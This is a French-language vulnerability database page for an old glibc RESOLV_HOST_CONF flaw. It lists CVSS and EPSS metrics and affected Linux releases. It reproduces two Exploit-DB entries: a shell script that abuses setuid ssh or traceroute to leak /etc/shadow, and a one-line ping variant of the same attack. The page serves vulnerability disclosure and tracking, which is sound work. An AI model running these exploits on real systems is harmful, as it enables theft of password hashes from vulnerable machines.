Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
2.1 |
|
AV:L/AC:L/Au:N/C:P/I:N/A:N |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 258
Date de publication : 2001-01-24 23h00 +00:00
Auteur : krochos
EDB Vérifié : Yes
# Charles Stevenson <csteven@newhope.terraplex.com>
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)
# This exploits is for glibc >= 2.1.9x.
# (****krochos@linuxmail.org****)
# Edit this if you have a problem with path
ssh=/usr/bin/ssh
traceroute=/usr/sbin/traceroute
FILE=/etc/shadow # File to read
###############################################################################
echo "$ssh"
echo "[*] Checking permisions..."
if [ ! -u $ssh ]; then
echo "$ssh is NOT setuid on this system or does not exist at all!"
if [ ! -u $traceroute ]; then
echo "$traceroute is NOT setuid on this system or does not exist at all!"
exit 0
fi
fi
export RESOLV_HOST_CONF=$FILE
echo "[*] Glibc bug found by Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>"
echo "[*] krochos@linuxmail.org"
sleep 1
echo "[*] export RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv
cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '
# milw0rm.com [2001-01-25]
Exploit Database EDB-ID : 317
Date de publication : 1995-12-31 23h00 +00:00
Auteur : Jared Mauch
EDB Vérifié : Yes
setenv RESOLV_HOST_CONF /etc/shadow; ping adfas
# milw0rm.com [1996-01-01]
Products Mentioned
Configuraton 0
Immunix>>Immunix >> Version 7.0_beta
Conectiva>>Linux >> Version 4.0
Conectiva>>Linux >> Version 4.0es
Conectiva>>Linux >> Version 4.1
Conectiva>>Linux >> Version 4.2
Conectiva>>Linux >> Version 5.0
Conectiva>>Linux >> Version 5.1
Conectiva>>Linux >> Version 6.0
Conectiva>>Linux >> Version ecommerce
Conectiva>>Linux >> Version graficas
Configuraton 0
Debian>>Debian_linux >> Version 2.3
Redhat>>Linux >> Version 7.0
Redhat>>Linux >> Version 7.0
Références